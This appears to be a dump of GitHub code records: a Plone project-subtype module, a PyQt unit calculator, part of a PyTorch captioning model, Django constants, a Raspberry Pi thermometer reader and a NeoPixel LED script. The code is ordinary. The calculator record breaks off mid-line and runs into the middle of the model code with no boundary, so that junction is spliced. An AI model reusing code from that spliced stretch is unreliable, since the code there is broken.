getUtility(ISubtyper)\n subtyper.change_type(\n self.context['news'],\n 'bit.plone.project.ProjectNews')\n self.context['news'].setTitle('News')\n\n def add_links_folder(self):\n if not 'links' in self.context:\n self.context.invokeFactory('Folder', 'links')\n if not IProjectLinks(self.context['links'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['links'],\n 'bit.plone.project.ProjectLinks')\n self.context['links'].setTitle('Links')\n\n def add_partners_folder(self):\n if not 'partners' in self.context:\n 
self.context.invokeFactory('Folder', 'partners')\n if not IProjectPartners(self.context['partners'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['partners'],\n 'bit.plone.project.ProjectPartners')\n self.context['partners'].setTitle('Partners')\n\n def add_events_folder(self):\n if not 'events' in self.context:\n self.context.invokeFactory('Folder', 'events')\n if not IProjectEvents(self.context['events'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['events'],\n 'bit.plone.project.ProjectEvents')\n self.context['events'].setTitle('Events')\n\n def add_info_folder(self):\n if not 'info' in self.context:\n self.context.invokeFactory('Folder', 'info')\n if not IProjectInfo(self.context['info'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['info'],\n 'bit.plone.project.ProjectInfo')\n self.context['info'].setTitle('Info')\n\n def add_media_folder(self):\n if not 'media' in self.context:\n self.context.invokeFactory('Folder', 'media')\n if not IProjectMedia(self.context['media'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['media'],\n 'bit.plone.project.ProjectMedia')\n self.context['media'].setTitle('Media')\n\n\nclass ProjectNews(object):\n implements(IProjectNews)\n\n def __init__(self, context):\n self.context = context\n\n def get_news(self, **kwa):\n content_filter = {}\n content_filter['path'] = dict(\n query=self.get_path(),\n depth=-1)\n content_filter['portal_type'] = 'News Item'\n content_filter['sort_on'] = 'effective'\n content_filter['sort_order'] = 'descending'\n max_items = kwa.get('max_items')\n if int(max_items or 0) == -1:\n return []\n return IFolderResults(self.context).get_results(\n contentFilter=content_filter,\n **kwa)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n\n\nclass ProjectEvents(object):\n implements(IProjectEvents)\n\n def __init__(self, context):\n self.context = context\n\n def get_events(self):\n pass\n\n\nclass ProjectLinks(object):\n implements(IProjectLinks)\n\n def __init__(self, context):\n self.context = context\n\n def get_links(self, **kwa):\n content_filter = {}\n content_filter['path'] = dict(\n query=self.get_path(),\n depth=-1)\n content_filter['portal_type'] = 'Link'\n content_filter['sort_on'] = 'effective'\n kwa['sort_on'] = 'effective'\n max_items = kwa.get('max_items')\n if int(max_items or 0) == -1:\n return []\n return IFolderResults(self.context).get_results(\n contentFilter=content_filter,\n **kwa)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n\n\nclass ProjectPartners(object):\n implements(IProjectPartners)\n\n def __init__(self, context):\n self.context = context\n\n def get_partners(self):\n pass\n\n\nclass ProjectSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project'\n description = u'A project'\n type_interface = IProjectSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = 'info'\n permission = 'bit.plone.project.AddProject'\n\n\nclass ProjectNewsSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project news'\n description = u'Project news, 
URLs etc'\n type_interface = IProjectNewsSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectNews'\n\n\nclass ProjectEventsSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project events'\n description = u'Project events, URLs etc'\n type_interface = IProjectEventsSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectEvents'\n\n\nclass ProjectLinksSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project links'\n description = u'Project links, URLs etc'\n type_interface = IProjectLinksSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectLinks'\n\n\nclass ProjectPartnersSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project partners'\n description = u'Project partners, URLs etc'\n type_interface = IProjectPartnersSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectPartners'\n\n\nclass ProjectLinksResultsDelegation(object):\n\n def __init__(self, context):\n self.context = context\n\n def getResults(self, **kwa):\n return IProjectLinks(self.context).get_links(**kwa)\n\n\nclass ProjectNewsResultsDelegation(object):\n\n def __init__(self, context):\n self.context = context\n\n def getResults(self, **kwa):\n return IProjectNews(self.context).get_news(**kwa)\n","repo_name":"bithub/bit.plone.project","sub_path":"bit/plone/project/subtypes/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":12687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33074622003","text":"import traceback\nfrom math import sin, asin, cos, acos, tan, atan, pi, e, log, log10, sqrt\nimport webbrowser\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QLayout, QLineEdit,\n QSizePolicy, QToolButton, QWidget, QLabel, QTextBrowser, QTextEdit, QCheckBox, QComboBox)\nfrom PyQt5.QtGui import QClipboard\n \nfrom appinfo import version, appname, about, hidden_features\nfrom units import *\n\nfrom units_description import unit_description\nfrom imperial_lengh_format import imperial_lengh_format\n\n#---------------------------------------------------------------------\n\nunit_list = ['kg', 't', 'lb', 'UKton', 'USton']\nunit_list += ['um', 'mm', 'cm', 'dm', 'm', 'km', 'inch', 'ft', 'yd', 'mile']\nunit_list += ['mm2', 'cm2','m2', 'ha', 'inch2', 'ft2', 'yd2']\nunit_list += ['mm3', 'cm3', 'dm3','m3', 'inch3', 'ft3']\nunit_list += ['mm4', 'cm4','m4', 'inch4', 'ft4']\nunit_list += ['N', 'kN','lbf', 'kip']\nunit_list += ['Nm', 'kNm','lbfinch', 
'lbfft', 'kipinch', 'kipft']\nunit_list += ['Pa', 'kN/m2', 'kPa','MPa', 'bar', 'GPa', 'psi', 'ksi', 'psf', 'ksf']\nunit_list += ['kN/m', 'lbf/ft', 'plf', 'kip/ft', 'klf']\nunit_list += ['kN/m3', 'lbf/inch3', 'kip/ft3' ,'pci' ,'pcf', 'kcf']\nunit_list += ['kg/m3', 't/m3', 'lb/ft3',]\nunit_list += ['s', 'h']\n\nextra_units_list = ['ft_inch'] #those units has no button\n\nuser_used_units = ['kg', 'm','m2', 'm3', 'm4', 'kN', 'kNm', 'kPa', 'kN/m', 'kN/m3', 'kg/m3', 's']\n\ndef are_the_same_unit(val1, val2):\n try:\n val1 + val2\n return True\n except:\n return False\n\ndef unit_color(val):\n if are_the_same_unit(val, kg):\n colour = \"background-color: rgb(251,155,111)\"\n elif are_the_same_unit(val, m):\n colour = \"background-color: rgb(251,239,112)\"\n elif are_the_same_unit(val, m2):\n colour = \"background-color: rgb(134,250,128)\"\n elif are_the_same_unit(val, m3):\n colour = \"background-color: rgb(129,248,242)\"\n elif are_the_same_unit(val, m4):\n colour = \"background-color: rgb(183,193,251)\"\n elif are_the_same_unit(val, N):\n colour = \"background-color: rgb(250,183,246)\"\n elif are_the_same_unit(val, Nm):\n colour = \"background-color: rgb(251,155,111)\"\n elif are_the_same_unit(val, Pa):\n colour = \"background-color: rgb(251,239,112)\"\n elif are_the_same_unit(val, N/m):\n colour = \"background-color: rgb(134,250,128)\"\n elif are_the_same_unit(val, N/m3):\n colour = \"background-color: rgb(129,248,242)\"\n elif are_the_same_unit(val, kg/m3):\n colour = \"background-color: rgb(183,193,251)\"\n else:\n colour = \"background-color: rgb(250,183,246)\"\n return colour\n\n#---------------------------------------------------------------------\n\nclass Button(QToolButton):\n def __init__(self, text, parent=None):\n super(Button, self).__init__(parent)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)\n self.setText(text)\n\n def sizeHint(self):\n size = super(Button, self).sizeHint()\n size.setHeight(size.height() + 15)\n size.setWidth(max(size.width(), size.height()))\n return size\n \ndef createButton(text, member):\n button = Button(text)\n button.clicked.connect(member)\n return button\n\n#---------------------------------------------------------------------\n\nans = 0\n\nreport_default_text = 'Here you can write simple report. Use the |Add to report| button to get results here. 
Enjoy!'\n\nclass MAINWINDOW(QWidget):\n NumDigitButtons = 10\n \n def __init__(self, parent=None):\n super(MAINWINDOW, self).__init__(parent)\n \n #---------\n self.result = 0\n self.block = False\n\n #---------\n self.display = QLineEdit('')\n self.display.setReadOnly(False)\n self.display.setAlignment(Qt.AlignRight)\n font = self.display.font()\n font.setPointSize(font.pointSize() + 4)\n self.display.setFont(font)\n self.display.textChanged.connect(self.auto_calculate)\n \n self.display_res = QLineEdit('')\n self.display_res.setReadOnly(True)\n self.display_res.setAlignment(Qt.AlignRight)\n font = self.display_res.font()\n font.setPointSize(font.pointSize() + 4)\n self.display_res.setFont(font)\n \n self.warnings = QLabel()\n self.warnings.setText(\"-\")\n self.warnings.setAlignment(Qt.AlignRight)\n \n self.autoCheckBox = QCheckBox('auto eval')\n self.autoCheckBox.setToolTip('if checked, every time you change the expression it will be evaluated')\n self.autoreportCheckBox = QCheckBox('auto add to report')\n self.autoreportCheckBox.setToolTip('if checked, every time you use |eval| or |=| result will be added to report')\n self.errorCheckBox = QCheckBox('error msg')\n self.errorCheckBox.setToolTip('if checked, you will get info why ERROR occurred')\n self.add_to_reportButton = createButton(\"add to report\",self.add_to_report)\n self.unit_ComboBox = QComboBox()\n self.unit_ComboBox.currentIndexChanged.connect(self.user_unit_changed)\n self.textEditor = QTextEdit()\n\n self.digitButtons = []\n for i in range(self.NumDigitButtons):\n self.digitButtons.append(createButton(str(i),\n self.basicClicked))\n\n self.unitButtons = []\n for i in unit_list:\n self.unitButtons.append(createButton(str(i),\n self.unitClicked))\n\n self.eButton = createButton(\"E\", self.basicClicked)\n self.eButton.setToolTip('E-notation (1E2 = 100, 1E-2 = 0.01 ..)')\n self.pointButton = createButton(\".\", self.basicClicked)\n self.deleteButton = createButton(\"DEL\",self.backspaceClicked)\n self.clearButton = createButton(\"C\", self.clear)\n self.divisionButton = createButton(\" / \",self.basicClicked)\n self.timesButton = createButton(\" * \",self.basicClicked)\n self.minusButton = createButton(\" - \", self.basicClicked)\n self.plusButton = createButton(\" + \", self.basicClicked)\n self.squareRootButton = createButton(\"^\",self.basicClicked)\n self.brackedopenButton = createButton(\"(\",self.basicClicked)\n self.brackedcloseButton = createButton(\")\",self.basicClicked)\n self.evallButton = createButton(\"eval\", self.evalClicked)\n self.evallButton.setToolTip('it evaluate expression')\n self.ansButton = createButton(\"ans\", self.basicClicked)\n self.ansButton.setToolTip('last answer key - it holds the result after the equals (=) key was last pressed')\n self.equalButton = createButton(\"=\", self.equalClicked)\n self.equalButton.setToolTip('it evaluate expression and move result to ans')\n self.infoButton = createButton(\"app info\", self.info_app)\n self.cb1Button = createButton(\"cb_res>>\", self.copy_res_to_clipboard)\n self.cb1Button.setToolTip('copy only result text to clipboard')\n self.cb2Button = createButton(\"cb_eq>>\", self.copy_equ_to_clipboard)\n self.cb2Button.setToolTip('copy all equation text to clipboard')\n self.cbinButton = createButton(\"< 0\n\t\tif self.to_pool:\n\t\t\tself.image_pooler = get_image_pooler(d_im, _config)\n\t\t\tif self.text_encoder is not None:\n\t\t\t\tself.text_pooler = get_text_pooler(d_txt, _config)\n\t\t# import pudb; pu.db\n\t\tself.fuser = get_fuser(_config)\n\n\tdef 
encode(self, batch):\n\t\tX_encode = dict()\n\n\t\tX_image = self.encode_image(batch)\n\t\tX_encode.update({'image': X_image})\n\n\t\t[\n\t\t\tX_encode.update({k: self.encode_text(batch, k)})\n\t\t\tfor k in TEXT_ENCODER_KEYS if k in batch\n\t\t]\n\t\tif self.fuser is not None:\n\t\t\tX_encode = self.fuser(X_encode)\n\t\t[\n\t\t\tX_encode.update({k: {\n\t\t\t\tf'{k}_id': batch[f'{k}_id'], \n\t\t\t\tf'{k}_mask': batch[f'{k}_mask']\n\t\t\t}})\n\t\t\tfor k in TEXT_DECODER_KEYS if f'{k}_id' in batch\n\t\t]\n\t\treturn X_encode\n\n\tdef encode_image(self, batch):\n\t\timages = batch['image']\n\t\tX_encode = dict()\n\t\tX, X_cls = self.image_encoder(images)\n\t\tif self.to_pool:\n\t\t\tX, ret = self.image_pooler(X_cls, X)\n\t\t\tX_encode.update(ret)\n\t\tX_encode['embedding'] = X\n\t\tX_encode['cls_embedding'] = X_cls\n\t\tX_encode['mask'] = torch.ones(X.shape[:2], device=X.device).long()\n\t\treturn X_encode\n\n\tdef encode_text(self, batch, k):\n\t\ttext_id, text_mask = batch[f'{k}_id'], batch[f'{k}_mask']\n\t\tX_encode = {\n\t\t\tf'{k}_id': text_id,\n\t\t\tf'{k}_mask': text_mask\n\t\t}\n\t\tif self.text_encoder is None:\n\t\t\treturn X_encode\n\t\telif isinstance(self.text_encoder, T5Adapter):\n\t\t\tX = self.text_encoder.t5.encoder(\n\t\t\t\tinput_ids=text_id,\n\t\t\t\tattention_mask=text_mask,\n\t\t\t)\n\t\t\tX = X.last_hidden_state\n\t\t\tmask_expanded = text_mask.unsqueeze(-1).expand(X.size()).float()\n\t\t\tX_cls = torch.sum(X * mask_expanded, dim=1)/ mask_expanded.sum(dim=1)\n\t\t\tX_mask = text_mask.bool()\n\t\telse:\n\t\t\tX, X_cls, X_mask = self.text_encoder(text_id, mask=text_mask, pool=self.to_pool)\n\t\tif self.to_pool:\n\t\t\tX, ret = self.text_pooler(X_cls, X, mask=X_mask)\n\t\t\tX_mask = torch.ones(X.shape[:2], device=X.device).long()\n\t\t\tX_encode.update(ret)\n\t\tX_encode['embedding'] = X\n\t\tX_encode['cls_embedding'] = X_cls\n\t\tX_encode['mask'] = X_mask.long()\n\t\treturn X_encode\n\n\tdef decode(self, X_encode):\n\t\tif isinstance(self.text_encoder, T5Adapter):\n\t\t\tX_out, X_label = self.text_encoder(**X_encode)\n\t\telse:\n\t\t\tX_out, X_label = self.text_decoder(**X_encode)\n\t\tX_decode = {\n\t\t\t'loss': X_out['loss'],\n\t\t\t'logits': X_out['logits'][..., :-1, :].contiguous(),\n\t\t\t'label': X_label[..., 1:].contiguous(),\n\t\t}\n\t\treturn X_decode\n\n\tdef generate(self, batch, X_encode, **kwargs):\n\t\tX_generate = {k:v for k,v in batch.items() if k not in NUMERICS}\n\t\tif isinstance(self.text_encoder, T5Adapter):\n\t\t\tgenerations = self.text_encoder.generate(**X_encode)\n\t\telse:\n\t\t\tgenerations = self.text_decoder.generate(**X_encode, **kwargs)\n\t\tX_generate['generated'] = generations\n\t\treturn X_generate\n","repo_name":"khanhnguyen21006/wikipedia_captioning","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"27750643882","text":"from django.utils.translation import gettext_lazy as _\n\naplikasi = {\n    'project': 'FINCAPES',\n    'portal_app': _('FINCAPES Project'),\n    'portal_name': 'FINCAPESPortal',\n    'domain': 'fincapes.com',\n    'required': '*',\n    'version': 'alpha 1.0'\n}\n\nCURRENCY_CHOICES = (\n    (1, 'CAD'),\n    (2, 'IDR'),\n    (3, 'USD')\n)\n\nSTATUS_CHOICES = (\n    (1, 'draft'),\n    (2, 'active')\n)\n\nDONOR_STATUS_CHOICES = (\n    (0, 'Draft'),\n    (1, 'Active'),\n    (2, 'Inactive')\n)\n\nDONOR_TYPE_CHOICES = (\n    (1, _('Government')),\n    (2, _('Private/Business'))\n)\n\nlanguages = (\n    ('id', _('Indonesia')),\n    ('en', 
_('English'))\n)\n\nmenu_setting = {\n    'change_password': _('Change Password'),\n    'sign_in': _('Sign in'),\n    'sign_out': _('Sign out'),\n    'sign_up': _('Register'),\n    'resend_activation': _('Resend activation'),\n    'activated': _('Activated'),\n    'add_new': _('Add New'),\n    'cancel': _('Cancel'),\n    'dashboard': _('Dashboard'),\n    'delete': _('Delete'),\n    'edit': _('Edit'),\n    'finish': _('Finish'),\n    'next': _('Next'),\n    'previous': _('Previous'),\n    'forgot_password': _('Forgot password'),\n    'reset_password': _('Reset Password'),\n    'user_profile': _('User Profile'),\n    'save': _('Save'),\n    'share': _('Share'),\n    'search': _('Search'),\n    'submit': _('Submit'),\n    'update': _('Update')\n}\n\nUSER_TYPE_CHOICES = (\n    (1, 'FINCAPES'),\n    (2, 'uWaterloo'),\n    (3, _('Partners')),\n    (4, _('Beneficiaries'))\n)\nUSER_CATEGORY_CHOICES = (\n    (1, _('Director')),\n    (2, _('Program Officer')),\n    (3, _('Administrative')),\n    (4, _('Finance'))\n)\n\nGENDER_CHOICES = (\n    (1, _('Female')),\n    (2, _('Male'))\n)\n\nTIMEZONES = (\n    ('Canada/Atlantic', 'Canada/Atlantic'),\n    ('Canada/Central', 'Canada/Central'),\n    ('Canada/Eastern', 'Canada/Eastern'),\n    ('Canada/Mountain', 'Canada/Mountain'),\n    ('Canada/Newfoundland', 'Canada/Newfoundland'),\n    ('Canada/Pacific', 'Canada/Pacific'),\n    ('Canada/Saskatchewan', 'Canada/Saskatchewan'),\n    ('Canada/Yukon', 'Canada/Yukon'),\n    ('Asia/Jakarta', 'Jakarta/WIB'),\n    ('Asia/Makassar', 'Makassar/WITA'),\n    ('Asia/Jayapura', 'Jayapura/WIT'),\n)\n\nlabel_settings = {\n    'no_data_available': _('No data available'),\n    'until': _('until'),\n    'page404': _('Sorry, this page is not available'),\n    'please_select': _('---- Please select ----'),\n    'no_blank': _('%s should not be blank'),\n    'required': '*'\n}\n\nSELECT_WIDGET_ATTRS = {\n    'data-placeholder': label_settings.get('please_select'),\n    'data-minimum-results-for-search': 'Infinity',\n    'data-allow-clear': False\n}\nSELECT_WIDGET_MODEL_NO_SEARCH_ATTRS = {\n    'data-minimum-results-for-search': 'Infinity',\n    \"data-minimum-input-length\": 0,\n    \"data-allow-clear\": False\n}\nSELECT_WIDGET_MODEL_WITH_SEARCH_ATTRS = {\n    # 'data-minimum-results-for-search': 'Infinity',\n    \"data-minimum-input-length\": 0,\n    \"data-allow-clear\": False\n}\n\nADDRESS_CHOICES = (\n    (1, _('Office')),\n    (2, _('Home')),\n)\n\npage_title = {\n    'project_info': _('Project Information')\n}\n\nsorted_str = \"abcdefghijklmnopqrstuvwxyz\"\nsorted_str_ = [x for x in sorted_str]\nCHOICES_STR = tuple(zip(sorted_str_, sorted_str_))","repo_name":"sangak/fincapes","sub_path":"fincapes/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19106019490","text":"import os\nimport glob\nimport time\n\n#os.system('modprobe w1-gpio')\n#os.system('modprobe w1-therm')\n\n\n\nclass TempReader:\n\n\tbase_dir = '/sys/bus/w1/devices/'\n\tbase_file = '/w1_slave'\n\tfolder_prefix = '28*'\n\n\n\tthermometers = []\n\n\tdef __init__(self, debug = False):\n\t\tdevice_folders = glob.glob(self.base_dir + self.folder_prefix)\n\t\tself._debug = debug\n\n\t\tfor folder in device_folders:\n\t\t\tt = Thermometer(folder, self.base_file)\n\t\t\tself.thermometers.append(t)\n\n\t\tif (self._debug):\n\t\t\tprint(\"there are \" + str(len(self.thermometers)) + \" thermometers connected\")\n\t\t\tfor therm in self.thermometers:\n\t\t\t\tprint(therm.getDeviceId())\n\n\n\tdef getThermometer(self, deviceId):\n\t\tfor t in self.thermometers:\n\t\t\tif t.getDeviceId() == 
deviceId:\n\t\t\t\treturn t\n\n\t\traise ThermometerException(deviceId)\n\t\t\n\n\n\nclass Thermometer:\n\n\t_device_file = ''\n\t_id = ''\n\n\tdef __init__(self, folder, base):\n\t\tself._device_file = folder + base\n\t\tself._id = os.path.split(folder)[1]\n\n\tdef getDeviceId(self):\n\t\treturn self._id\n\n\tdef read_temp_raw(self):\n\t\tf = open(self._device_file, 'r')\n\t\tlines = f.readlines()\n\t\tf.close()\n\t\treturn lines\n\n\tdef read_temp(self):\n\t\tlines = self.read_temp_raw()\n\t\twhile lines[0].strip()[-3:] != 'YES':\n\t\t\ttime.sleep(0.2)\n\t\t\tlines = self.read_temp_raw()\n\t\tequals_pos = lines[1].find('t=')\n\t\tif equals_pos != -1:\n\t\t\ttemp_string = lines[1][equals_pos+2:]\n\t\t\ttemp_c = float(temp_string) / 1000.0\n\t\t\treturn temp_c\n\n\n\nclass ThermometerException(Exception):\n\tdef __init__(self, deviceId):\n\t\tself.deviceId = deviceId\n\n\tdef __str__(self):\n\t\treturn \"The thermometer with id '\" + str(self.deviceId) + \"' is not found.\"\n\n\n","repo_name":"julienfastre/rasPyThermReader","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19915507777","text":"from __future__ import division\nfrom __future__ import print_function\n# NeoPixel library strandtest example\n# Author: Tony DiCola (tony@tonydicola.com)\n#\n# Direct port of the Arduino NeoPixel library strandtest example. Showcases\n# various animations on a strip of NeoPixels.\nfrom builtins import range\nfrom past.utils import old_div\nimport time\nimport state\n\nfrom neopixel import *\n\n# Check for user imports\nimport config\n\n\n\n# LED strip configuration:\nLED_COUNT = 8 # Number of LED pixels.\nLED_PIN = config.pixelPin # GPIO pin connected to the pixels (must support PWM!).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0\nLED_STRIP = ws.SK6812_STRIP_RGBW\n#LED_STRIP = ws.SK6812W_STRIP\n\n\n# Define functions which animate LEDs in various ways.\ndef colorWipe(strip, color, wait_ms=50):\n\t\"\"\"Wipe color across display a pixel at a time.\"\"\"\n\tfor i in range(strip.numPixels()):\n\t\tstrip.setPixelColor(i, color)\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef theaterChase(strip, color, wait_ms=50, iterations=10):\n\t\"\"\"Movie theater light style chaser animation.\"\"\"\n\tfor j in range(iterations):\n\t\tfor q in range(3):\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, color)\n\t\t\tstrip.show()\n\t\t\ttime.sleep(wait_ms/1000.0)\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, 0)\n\ndef wheel(pos):\n\t\"\"\"Generate rainbow colors across 0-255 positions.\"\"\"\n\tif pos < 85:\n\t\treturn Color(pos * 3, 255 - pos * 3, 0)\n\telif pos < 170:\n\t\tpos -= 85\n\t\treturn Color(255 - pos * 3, 0, pos * 3)\n\telse:\n\t\tpos -= 170\n\t\treturn Color(0, pos * 3, 255 - pos * 3)\n\ndef rainbow(strip, wait_ms=20, iterations=1):\n\t\"\"\"Draw rainbow that fades across all pixels at once.\"\"\"\n\tfor j in range(256*iterations):\n\t\tfor i in range(strip.numPixels()):\n\t\t\tstrip.setPixelColor(i, wheel((i+j) & 255))\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef rainbowCycle(strip, wait_ms=20, 
iterations=5):\n\t\"\"\"Draw rainbow that uniformly distributes itself across all pixels.\"\"\"\n\tfor j in range(256*iterations):\n\t\tfor i in range(strip.numPixels()):\n\t\t\tstrip.setPixelColor(i, wheel(((old_div(i * 256, strip.numPixels())) + j) & 255))\n\t\tstrip.show()\n\t\ttime.sleep(wait_ms/1000.0)\n\ndef theaterChaseRainbow(strip, wait_ms=50):\n\t\"\"\"Rainbow movie theater light style chaser animation.\"\"\"\n\tfor j in range(256):\n\t\tfor q in range(3):\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, wheel((i+j) % 255))\n\t\t\tstrip.show()\n\t\t\ttime.sleep(wait_ms/1000.0)\n\t\t\tfor i in range(0, strip.numPixels(), 3):\n\t\t\t\tstrip.setPixelColor(i+q, 0)\n\n\n\ndef statusLEDs(strip, PixelLock):\n\n\n PixelLock.acquire()\n\n\n if (state.runLEDs == True):\n while (state.runRainbow == True):\n if (config.DEBUG):\n print(\"rainbow start\")\n rainbow(strip)\n #rainbowCycle(strip)\n #theaterChaseRainbow(strip)\n if (config.DEBUG):\n print(\"rainbow end\")\n\n for i in range(1,8):\n strip.setPixelColor(i,Color(0,0,0))\n\n time.sleep(0.2)\n strip.show()\n setDryness(strip, PixelLock)\n time.sleep(2.0)\n\n for i in range(1,8):\n strip.setPixelColor(i,Color(0,0,0))\n \n time.sleep(0.2)\n strip.show()\n setWaterLevel(strip, PixelLock)\n time.sleep(2.0)\n\n else:\n strip.setPixelColor(7,Color(0,0,0))\n strip.setPixelColor(6,Color(0,0,0))\n strip.setPixelColor(5,Color(0,0,0))\n strip.setPixelColor(4,Color(0,0,0))\n strip.setPixelColor(3,Color(0,0,0))\n strip.setPixelColor(2,Color(0,0,0))\n strip.setPixelColor(1,Color(0,0,0))\n strip.setPixelColor(0,Color(0,0,0))\n strip.show()\n\n PixelLock.release()\n\n\ndef setDryness(strip, PixelLock):\n\n \"\"\" uses 7 top pixels \"\"\"\n # 0 - 1/2 of set level- bottom two - RED\n # 1/2 - set level middle three - YELLOW\n # set equal above set level top = Green\n\n if (state.Moisture_Humidity > state.Moisture_Threshold):\n\n strip.setPixelColor(7,Color(255,0,0))\n strip.setPixelColor(6,Color(100,255,0))\n strip.setPixelColor(5,Color(100,255,0))\n strip.setPixelColor(4,Color(100,255,0))\n strip.setPixelColor(3,Color(0,255,0))\n strip.setPixelColor(2,Color(0,255,0))\n strip.setPixelColor(1,Color(0,255,0))\n\n else: \n if (state.Moisture_Humidity > state.Moisture_Threshold/2.0):\n\n count = int(old_div(( state.Moisture_Humidity-state.Moisture_Threshold/2.0),(3.0*state.Moisture_Threshold/2.0))) +1\n strip.setPixelColor(7,Color(0,0,0))\n if (count >2):\n strip.setPixelColor(6,Color(100,255,0))\n else:\n strip.setPixelColor(6,Color(0,0,0))\n if (count >1):\n strip.setPixelColor(5,Color(100,255,0))\n else:\n strip.setPixelColor(5,Color(0,0,0))\n if (count >0):\n strip.setPixelColor(4,Color(100,255,0))\n else:\n strip.setPixelColor(4,Color(0,0,0))\n\n strip.setPixelColor(3,Color(0,255,0))\n strip.setPixelColor(2,Color(0,255,0))\n strip.setPixelColor(1,Color(0,255,0))\n \n else:\n\n strip.setPixelColor(7,Color(0,0,0))\n strip.setPixelColor(6,Color(0,0,0))\n strip.setPixelColor(5,Color(0,0,0))\n strip.setPixelColor(4,Color(0,0,0))\n count = int(old_div(( state.Moisture_Humidity),((state.Moisture_Threshold/2.0)/3.0))) +1\n if (count >2):\n strip.setPixelColor(3,Color(0,255,0))\n else:\n strip.setPixelColor(3,Color(0,0,0))\n if (count >1):\n strip.setPixelColor(2,Color(0,255,0))\n else:\n strip.setPixelColor(2,Color(0,0,0))\n if (count >0):\n strip.setPixelColor(1,Color(0,255,0))\n else:\n strip.setPixelColor(1,Color(0,0,0))\n\n \n\n\n strip.show()\n\n\ndef setWaterLevel(strip, PixelLock):\n\n\n \"\"\" uses 7 top pixels \"\"\"\n 
# all 7 green until under 1/7 of level, step by 1/7 - then all black except for 1 - RED\n\n\n\n    count = int (state.Tank_Percentage_Full/14.0)\n\n    \n\n    for i in range(2,count+1):\n        strip.setPixelColor(i,Color(255,0,0))\n\n    strip.setPixelColor(1,Color(0,255,0))\n\n    \n\n\n    strip.show()\n\n\n\"\"\"\n\n# Main program logic follows:\nif __name__ == '__main__':\n\t# Create NeoPixel object with appropriate configuration.\n\tstrip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)\n\t# Initialize the library (must be called once before other functions).\n\tstrip.begin()\n\n\tprint ('Press Ctrl-C to quit.')\n\twhile True:\n\t\t# Color wipe animations.\n\t\tcolorWipe(strip, Color(255, 0, 0)) # Red wipe\n\t\tcolorWipe(strip, Color(0, 255, 0)) # Blue wipe\n\t\tcolorWipe(strip, Color(0, 0, 255)) # Green wipe\n\t\tcolorWipe(strip, Color(0, 0, 0, 255)) # White wipe\n\t\tcolorWipe(strip, Color(255, 255, 255)) # Composite White wipe\n\t\tcolorWipe(strip, Color(255, 255, 255, 255)) # 